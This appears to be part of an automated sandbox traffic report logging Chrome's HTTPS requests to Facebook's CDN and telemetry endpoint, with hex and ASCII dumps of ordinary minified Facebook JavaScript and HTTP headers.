                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1769INData Raw: 37 34 2c 31 35 33 39 32 34 31 39 34 39 2c 34 35 38 37 38 38 31 36 30 2c 33 34 33 36 33 31 35 30 30 37 2c 31 38 30 37 30 31 36 38 39 31 2c 33 37 31 38 34 30 38 38 33 30 2c 39 37 38 39 37 36 35 38 31 2c 31 30 34 33 36 36 33 34 32 38 2c 33 31 36 35 39 36 35 37 38 31 2c 31 39 32 37 39 39 30 39 35 32 2c 34 32 30 30 38 39 31 35 37 39 2c 32 33 37 32 32 37 36 39 31 30 2c 33 32 30 38 34 30 38 39 30 33 2c 33 35 33 33 34 33 31 39 30 37 2c 31 34 31 32 33 39 30 33 30 32 2c 32 39 33 31 39 38 30 30 35 39 2c 34 31 33 32 33 33 32 34 30 30 2c 31 39 34 37 30 37 38 30 32 39 2c 33 38 38 31 35 30 35 36 32 33 2c 34 31 36 38 32 32 36 34 31 37 2c 32 39 34 31 34 38 34 33 38 31 2c 31 30 37 37 39 38 38 31 30 34 2c 31 33 32 30 34 37 37 33 38 38 2c 38 38 36 31 39 35 38 31 38 2c 31 38
                                                                                                                                                                                                                                  Data Ascii: 74,1539241949,458788160,3436315007,1807016891,3718408830,978976581,1043663428,3165965781,1927990952,4200891579,2372276910,3208408903,3533431907,1412390302,2931980059,4132332400,1947078029,3881505623,4168226417,2941484381,1077988104,1320477388,886195818,18


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  72192.168.2.649800157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC592OUTGET /rsrc.php/v3ioXj4/y9/l/ru_RU/UlpshyJeqkw.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: sM5EmPOSTNCaG7HHvhTjEQ==
                                                                                                                                                                                                                                  Expires: Sun, 28 Sep 2025 17:13:36 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: vB/S/1CmPUxy0vOMJWZKyRHk9mWUSe53gzRRI/OnNLblfybF6q8slk6Vk5iDWTGZIymN6m7U2Lg0cRO4EpCKkg==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:22 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 49381
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC15862INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 72 74 69 6c 6c 65 72 79 53 65 67 6d 65 6e 74 22 2c 5b 22 69 6e 76 61 72 69 61 6e 74 22 2c 22 63 72 3a 39 39 38 35 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 29 7b 76 61 72 20 69 3d 30 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 61 7c 7c 68 28 30 2c 31 34 39 36 29 2c 22 63 61 74 65 67 6f 72 79 22 69 6e 20 61 26 26 22 64 65 73 63 72 69 70 74 69 6f 6e 22 69 6e 20 61 7c 7c 68 28 30 2c 33 31 33 38 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 29 29 2c 74 68 69 73 2e 24 31 3d 21 31 2c 74 68 69 73 2e 24 32 3d 62 61 62 65 6c 48 65 6c 70 65 72 73 5b 22 65 78 74 65 6e 64 73 22 5d 28 7b 7d 2c 61 2c 7b 69 64 3a
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("ArtillerySegment",["invariant","cr:9985"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"category"in a&&"description"in a||h(0,3138,JSON.stringify(a)),this.$1=!1,this.$2=babelHelpers["extends"]({},a,{id:
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC16384INData Raw: 34 5c 75 30 34 34 33 5c 75 30 34 33 64 5c 75 30 34 33 61 5c 75 30 34 34 36 5c 75 30 34 33 38 5c 75 30 34 34 65 20 49 6e 73 74 61 67 72 61 6d 20 5c 75 30 34 33 38 5c 75 30 34 33 62 5c 75 30 34 33 38 20 5c 75 30 34 33 32 5c 75 30 34 33 37 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 63 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 34 63 20 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 33 39 2d 5c 75 30 34 34 32 5c 75 30 34 33 65 20 5c 75 30 34 33 30 5c 75 30 34 33 61 5c 75 30 34 33 61 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 64 5c 75 30 34 34 32 2c 20 5c 75 30 34 34 64 5c 75 30 34 34 32 5c 75 30 34 33 65 20 5c 75 30 34 33 63 5c 75 30 34 33 65 5c 75 30 34 34 38 5c 75 30 34 33 35 5c 75 30 34 33 64 5c 75 30 34 33 64 5c 75 30 34 33 38 5c 75
                                                                                                                                                                                                                                  Data Ascii: 4\u0443\u043d\u043a\u0446\u0438\u044e Instagram \u0438\u043b\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u0442\u044c \u0447\u0435\u0439-\u0442\u043e \u0430\u043a\u043a\u0430\u0443\u043d\u0442, \u044d\u0442\u043e \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC16384INData Raw: 28 61 2e 70 6f 6c 69 63 79 2e 73 3d 3d 3d 31 29 7b 61 2e 74 61 67 73 3d 64 28 22 46 61 6c 63 6f 55 74 69 6c 73 22 29 2e 78 6f 72 42 69 74 6d 61 70 28 28 62 3d 61 2e 74 61 67 73 29 21 3d 6e 75 6c 6c 3f 62 3a 5b 30 2c 30 5d 2c 77 29 3b 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 24 28 61 29 7b 69 66 28 61 3d 3d 3d 22 22 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 69 66 28 74 2e 68 61 73 28 61 29 29 72 65 74 75 72 6e 20 74 2e 67 65 74 28 61 29 3b 65 6c 73 65 7b 76 61 72 20 62 3d 7b 63 6c 61 69 6d 3a 22 22 7d 2c 63 3d 61 2e 73 70 6c 69 74 28 22 5e 23 22 29 3b 69 66 28 63 2e 6c 65 6e 67 74 68 3e 3d 34 29 7b 76 61 72 20 64 3d 63 5b 30 5d 2c 65 3d 63 5b 31 5d 2c 66 3d 63 5b 32 5d 3b 63 3d 63 5b 33 5d 3b 66 21 3d 3d 22 22 3f 62 3d
                                                                                                                                                                                                                                  Data Ascii: (a.policy.s===1){a.tags=d("FalcoUtils").xorBitmap((b=a.tags)!=null?b:[0,0],w);return!0}return!1}function $(a){if(a==="")return null;if(t.has(a))return t.get(a);else{var b={claim:""},c=a.split("^#");if(c.length>=4){var d=c[0],e=c[1],f=c[2];c=c[3];f!==""?b=
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC750INData Raw: 73 65 6e 64 28 29 7d 3b 69 66 28 63 28 22 4e 65 74 77 6f 72 6b 53 74 61 74 75 73 22 29 2e 69 73 4f 6e 6c 69 6e 65 28 29 29 6b 28 29 3b 65 6c 73 65 7b 66 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 6f 6e 6c 69 6e 65 3b 61 26 26 28 6b 28 29 2c 67 2e 72 65 6d 6f 76 65 28 29 29 7d 3b 67 3d 63 28 22 4e 65 74 77 6f 72 6b 53 74 61 74 75 73 22 29 2e 6f 6e 43 68 61 6e 67 65 28 66 29 7d 7d 7d 2c 63 6c 65 61 6e 4f 6e 4c 6f 67 6f 75 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 64 28 22 57 65 62 53 74 6f 72 61 67 65 43 6c 65 61 6e 75 70 52 65 61 73 6f 6e 22 29 2e 73 65 74 4c 61 73 74 43 6c 65 61 6e 75 70 52 65 61 73 6f 6e 28 62 29 3b 63 28 22 43 61 63 68 65 53 74 6f 72 61 67 65 22 29 2e 64 69 73 61 62 6c 65 50 65 72 73 69 73 74 65 6e 74 57 72 69 74 65 73 28
                                                                                                                                                                                                                                  Data Ascii: send()};if(c("NetworkStatus").isOnline())k();else{f=function(a){a=a.online;a&&(k(),g.remove())};g=c("NetworkStatus").onChange(f)}}},cleanOnLogout:function(a,b){d("WebStorageCleanupReason").setLastCleanupReason(b);c("CacheStorage").disablePersistentWrites(


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  73192.168.2.649801157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC374OUTGET /rsrc.php/v3/yT/r/DHWoESmf_2P.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: BOsB5wO8Yj0/bkLXEdvZCA==
                                                                                                                                                                                                                                  Expires: Sat, 20 Sep 2025 08:39:35 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: J4mpuwoVElbxRBzAnWp/TjTrKPqthfL5PQKBNgXTnPeB7TiecvkgD4wBm+tzYyUx6ycr2zZV/NLnWjjaEB3ltw==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:22 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=5, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 82019
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC15871INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 4e 65 63 74 61 72 22 2c 5b 22 45 6e 76 22 2c 22 67 65 74 43 6f 6e 74 65 78 74 75 61 6c 50 61 72 65 6e 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 76 61 72 20 67 3b 66 75 6e 63 74 69 6f 6e 20 68 28 61 29 7b 61 2e 6e 63 74 72 7c 7c 28 61 2e 6e 63 74 72 3d 7b 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 61 29 7b 69 66 28 28 67 7c 7c 28 67 3d 62 28 22 45 6e 76 22 29 29 29 2e 6d 6f 64 75 6c 65 7c 7c 21 61 29 72 65 74 75 72 6e 28 67 7c 7c 28 67 3d 62 28 22 45 6e 76 22 29 29 29 2e 6d 6f 64 75 6c 65 3b 76 61 72 20 63 3d 7b 66 62 70 61 67 65 5f 66 61 6e 5f 63 6f 6e 66 69 72 6d 3a 21 30 2c 70 68 6f 74 6f 73 5f 73 6e 6f 77 6c 69 66 74 3a 21 30 7d 2c 64 3b 77 68 69
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("Nectar",["Env","getContextualParent"],(function(a,b,c,d,e,f){var g;function h(a){a.nctr||(a.nctr={})}function i(a){if((g||(g=b("Env"))).module||!a)return(g||(g=b("Env"))).module;var c={fbpage_fan_confirm:!0,photos_snowlift:!0},d;whi
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC16384INData Raw: 39 31 3b 74 68 69 73 2e 68 5b 31 5d 2b 3d 64 3b 64 3d 74 68 69 73 2e 68 5b 31 5d 3e 3e 3e 31 33 3b 74 68 69 73 2e 68 5b 31 5d 26 3d 38 31 39 31 3b 74 68 69 73 2e 68 5b 32 5d 2b 3d 64 3b 63 5b 30 5d 3d 74 68 69 73 2e 68 5b 30 5d 2b 35 3b 64 3d 63 5b 30 5d 3e 3e 3e 31 33 3b 63 5b 30 5d 26 3d 38 31 39 31 3b 66 6f 72 28 65 3d 31 3b 65 3c 31 30 3b 65 2b 2b 29 63 5b 65 5d 3d 74 68 69 73 2e 68 5b 65 5d 2b 64 2c 64 3d 63 5b 65 5d 3e 3e 3e 31 33 2c 63 5b 65 5d 26 3d 38 31 39 31 3b 63 5b 39 5d 2d 3d 31 3c 3c 31 33 3b 64 3d 28 64 5e 31 29 2d 31 3b 66 6f 72 28 65 3d 30 3b 65 3c 31 30 3b 65 2b 2b 29 63 5b 65 5d 26 3d 64 3b 64 3d 7e 64 3b 66 6f 72 28 65 3d 30 3b 65 3c 31 30 3b 65 2b 2b 29 74 68 69 73 2e 68 5b 65 5d 3d 74 68 69 73 2e 68 5b 65 5d 26 64 7c 63 5b 65 5d 3b
                                                                                                                                                                                                                                  Data Ascii: 91;this.h[1]+=d;d=this.h[1]>>>13;this.h[1]&=8191;this.h[2]+=d;c[0]=this.h[0]+5;d=c[0]>>>13;c[0]&=8191;for(e=1;e<10;e++)c[e]=this.h[e]+d,d=c[e]>>>13,c[e]&=8191;c[9]-=1<<13;d=(d^1)-1;for(e=0;e<10;e++)c[e]&=d;d=~d;for(e=0;e<10;e++)this.h[e]=this.h[e]&d|c[e];
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC16384INData Raw: 74 72 65 61 6d 5f 73 61 6c 73 61 32 30 5f 78 6f 72 3a 77 2c 63 72 79 70 74 6f 5f 73 74 72 65 61 6d 5f 73 61 6c 73 61 32 30 3a 78 2c 63 72 79 70 74 6f 5f 6f 6e 65 74 69 6d 65 61 75 74 68 3a 42 2c 63 72 79 70 74 6f 5f 6f 6e 65 74 69 6d 65 61 75 74 68 5f 76 65 72 69 66 79 3a 43 2c 63 72 79 70 74 6f 5f 76 65 72 69 66 79 5f 31 36 3a 70 2c 63 72 79 70 74 6f 5f 76 65 72 69 66 79 5f 33 32 3a 71 2c 63 72 79 70 74 6f 5f 73 65 63 72 65 74 62 6f 78 3a 44 2c 63 72 79 70 74 6f 5f 73 65 63 72 65 74 62 6f 78 5f 6f 70 65 6e 3a 45 2c 63 72 79 70 74 6f 5f 73 63 61 6c 61 72 6d 75 6c 74 3a 53 2c 63 72 79 70 74 6f 5f 73 63 61 6c 61 72 6d 75 6c 74 5f 62 61 73 65 3a 54 2c 63 72 79 70 74 6f 5f 62 6f 78 5f 62 65 66 6f 72 65 6e 6d 3a 56 2c 63 72 79 70 74 6f 5f 62 6f 78 5f 61 66 74
                                                                                                                                                                                                                                  Data Ascii: tream_salsa20_xor:w,crypto_stream_salsa20:x,crypto_onetimeauth:B,crypto_onetimeauth_verify:C,crypto_verify_16:p,crypto_verify_32:q,crypto_secretbox:D,crypto_secretbox_open:E,crypto_scalarmult:S,crypto_scalarmult_base:T,crypto_box_beforenm:V,crypto_box_aft
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC16384INData Raw: 6e 45 6e 61 62 6c 65 64 7c 7c 61 2e 6d 6f 7a 46 75 6c 6c 53 63 72 65 65 6e 45 6e 61 62 6c 65 64 7c 7c 61 2e 6d 73 46 75 6c 6c 73 63 72 65 65 6e 45 6e 61 62 6c 65 64 7c 7c 61 2e 66 75 6c 6c 73 63 72 65 65 6e 45 6e 61 62 6c 65 64 3b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 62 7c 7c 61 2e 77 65 62 6b 69 74 43 61 6e 63 65 6c 46 75 6c 6c 53 63 72 65 65 6e 7c 7c 61 2e 6d 6f 7a 43 61 6e 63 65 6c 46 75 6c 6c 53 63 72 65 65 6e 7c 7c 61 2e 6d 73 45 78 69 74 46 75 6c 6c 73 63 72 65 65 6e 7c 7c 61 2e 63 61 6e 63 65 6c 46 75 6c 6c 53 63 72 65 65 6e 7c 7c 61 2e 65 78 69 74 46 75 6c 6c 53 63 72 65 65 6e 29 7d 3b 72 65 74 75 72 6e 20 62 7d 28 63 28 22 6d 69 78 69 6e 22 29 28 63 28 22 41 72 62 69 74 65 72 4d 69 78 69 6e 22 29 29 29 3b 62 3d 6e 65 77 20 61 28 29 3b 65
                                                                                                                                                                                                                                  Data Ascii: nEnabled||a.mozFullScreenEnabled||a.msFullscreenEnabled||a.fullscreenEnabled;return Boolean(b||a.webkitCancelFullScreen||a.mozCancelFullScreen||a.msExitFullscreen||a.cancelFullScreen||a.exitFullScreen)};return b}(c("mixin")(c("ArbiterMixin")));b=new a();e
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1500INData Raw: 62 29 7b 74 68 69 73 2e 24 31 3d 61 2c 74 68 69 73 2e 24 32 3d 62 7d 76 61 72 20 62 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 62 2e 67 65 74 55 52 49 42 75 69 6c 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 68 69 73 2c 64 3d 6e 65 77 28 63 28 22 58 43 6f 6e 74 72 6f 6c 6c 65 72 55 52 49 42 75 69 6c 64 65 72 22 29 29 28 74 68 69 73 2e 24 31 2c 74 68 69 73 2e 24 32 29 3b 69 66 28 61 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 67 65 74 52 65 71 75 65 73 74 28 61 29 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 68 69 73 2e 24 32 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 62 2e 24 32 5b 61 5d 2c 66 3d 22 22 3b 21 63 2e 72 65 71 75 69 72 65 64 26 26 21 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61
                                                                                                                                                                                                                                  Data Ascii: b){this.$1=a,this.$2=b}var b=a.prototype;b.getURIBuilder=function(a){var b=this,d=new(c("XControllerURIBuilder"))(this.$1,this.$2);if(a){var e=this.getRequest(a);Object.keys(this.$2).forEach(function(a){var c=b.$2[a],f="";!c.required&&!Object.prototype.ha
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC15495INData Raw: 22 52 65 6c 6f 61 64 50 61 67 65 22 29 2e 6e 6f 77 28 29 7d 29 2e 73 65 6e 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 5c 78 61 30 22 2c 22 67 22 29 2c 22 26 6e 62 73 70 3b 22 29 7d 66 75 6e 63 74 69 6f 6e 20 65 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 26 6e 62 73 70 3b 22 2c 22 67 22 29 2c 22 5c 78 61 30 22 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 61 29 7b 6e 65 77 28 63 28 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 29 29 28 29 2e 73 65 74 55 52 49 28 69 29 2e 73 65 74 44 61 74 61 28 7b 72 6d 6f 64 65 3a 61 7d 29 2e 73 65 74 48 61 6e 64 6c 65 72 28 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 22 52 65 6c 6f 61
                                                                                                                                                                                                                                  Data Ascii: "ReloadPage").now()}).send()}function b(a){return a.replace(new RegExp("\xa0","g"),"&nbsp;")}function e(a){return a.replace(new RegExp("&nbsp;","g"),"\xa0")}function f(a){new(c("AsyncRequest"))().setURI(i).setData({rmode:a}).setHandler(function(){d("Reloa


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  74192.168.2.649742157.240.252.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC1187OUTPOST /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923633127123911&__req=1&__rev=1016900551&__s=8mcer0%3Aeat7lj%3A1dha06&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585595&__user=0&dpr=1&jazoest=2941&locale=ru_RU&lsd=AVrc04HtcqM HTTP/1.1
                                                                                                                                                                                                                                  Host: www.facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 914
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQGkdC1KMpjrajKKo
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; _js_datr=O934ZvtQ_C-R3ZM0Ae39F-hF
                                                                                                                                                                                                                                  2024-09-29 04:53:22 UTC914OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 51 47 6b 64 43 31 4b 4d 70 6a 72 61 6a 4b 4b 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 73 22 0d 0a 0d 0a 31 37 32 37 35 38 35 36 30 32 31 37 39 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 51 47 6b 64 43 31 4b 4d 70 6a 72 61 6a 4b 4b 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 71 22 0d 0a 0d 0a 5b 7b 22 75 73 65 72 22 3a 22 30 22 2c 22 77 65 62 53 65 73 73 69 6f 6e 49 64 22 3a 22 38 6d 63 65 72 30 3a 65 61 74 37 6c 6a 3a 31 64 68 61 30 36 22 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31
                                                                                                                                                                                                                                  Data Ascii: ------WebKitFormBoundaryQGkdC1KMpjrajKKoContent-Disposition: form-data; name="ts"1727585602179------WebKitFormBoundaryQGkdC1KMpjrajKKoContent-Disposition: form-data; name="q"[{"user":"0","webSessionId":"8mcer0:eat7lj:1dha06","app_id":"256281
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC747INHTTP/1.1 200 OK
